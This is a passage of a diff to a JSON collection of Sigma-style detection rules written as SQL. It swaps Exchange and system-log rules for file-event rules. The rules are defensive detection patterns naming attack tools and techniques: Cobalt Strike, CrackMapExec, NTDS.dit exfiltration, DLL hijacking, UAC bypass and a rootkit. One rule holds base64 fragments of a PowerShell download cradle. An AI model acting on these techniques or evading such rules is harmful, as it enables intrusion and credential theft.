"attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" + "filename": "file_event_win_susp_exchange_aspx_write.yml" }, { - "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "title": "Legitimate Application Dropped Archive", + "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "status": "experimental", - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "author": "Florian Roth (Nextron Systems), @testanull", + "description": "Detects programs on a Windows system that should not write an archive to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.t1210" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" ], - "filename": "win_exchange_cve_2021_42321.yml" + "filename": "file_event_win_legitimate_app_dropping_archive.yml" }, { - "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "title": "Pingback Backdoor File Indicators", + "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", "status": "test", - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "author": "Jose Rodriguez @Cyb3rPandaH", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ "attack.persistence", - "attack.t1505.003" + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" + "filename": "file_event_win_malware_pingback_backdoor.yml" }, { - "title": "Failed MSExchange Transport Agent Installation", - "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "title": "Windows Shell/Scripting Application File Write to Suspicious Folder", + "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "status": "experimental", - "description": "Detects a failed installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.002" - ], + "description": "Detects Windows shells and scripting applications that write files to suspicious folders", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "win_exchange_transportagent_failed.yml" + "filename": "file_event_win_shell_write_susp_directory.yml" }, { - "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "title": "Suspicious NTDS Exfil Filename Patterns", + "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "status": "test", - "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\')" ], - "filename": "win_dns_server_susp_server_level_plugin_dll.yml" + "filename": "file_event_win_ntds_exfil_tools.yml" }, { - "title": "Suspicious Service Installation Script", - "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", - "status": "experimental", - "description": "Detects suspicious service installation scripts", - "author": "pH-T (Nextron Systems)", + "title": "Powerup Write Hijack DLL", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "status": "test", + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "author": "Subhash Popuri (@pbssubhash)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Any powershell script that creates bat files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_script.yml" + "filename": "file_event_win_hktl_powerup_dllhijacking.yml" }, { - "title": "Local Privilege Escalation Indicator TabTip", - "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "title": "RDP File Creation From Suspicious Application", + "id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "status": "experimental", - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Rclone config file being created", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Whale.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Discord.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Keybase.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msteams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Slack.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\teams.exe' ESCAPE '\\') AND TargetFilename LIKE '%.rdp%' ESCAPE '\\')" ], - "filename": "win_system_lpe_indicators_tabtip.yml" + "filename": "file_event_win_rdp_file_susp_creation.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "status": "experimental", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "status": "test", + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.t1068" ], "falsepositives": [ - "Highly unlikely" + "Unknown", + "Possibly some Microsoft Edge upgrades" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" }, { - "title": "KrbRelayUp Service Installation", - "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "status": "experimental", - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "author": "Sittikorn S, Tim Shelton", + "title": "Moriya Rootkit", + "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "status": "test", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\'" ], - "filename": "win_system_krbrelayup_service_installation.yml" + "filename": "file_event_win_moriya_rootkit.yml" }, { - "title": "NTFS Vulnerability Exploitation", - "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "status": "test", - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "title": "CrackMapExec File Creation Patterns", + "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "status": "experimental", + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1499.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_system_ntfs_vuln_exploit.yml" + "filename": "file_event_win_crackmapexec_patterns.yml" }, { - "title": "CobaltStrike Service Installations - System", - "id": "5a105d34-05fc-401e-8553-272b45c1522d", + "title": "Files With System Process Name In Unsuspected Locations", + "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Unknown" + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" ], - "filename": "win_system_cobaltstrike_service_installs.yml" + "filename": "file_event_win_creation_system_file.yml" }, { - "title": "RTCore Suspicious Service Installation", - "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", - "status": "experimental", - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using .NET Code Profiler on MMC", + "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "status": "test", + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" ], - "filename": "win_system_susp_rtcore64_service_install.yml" + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - System", - "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "title": 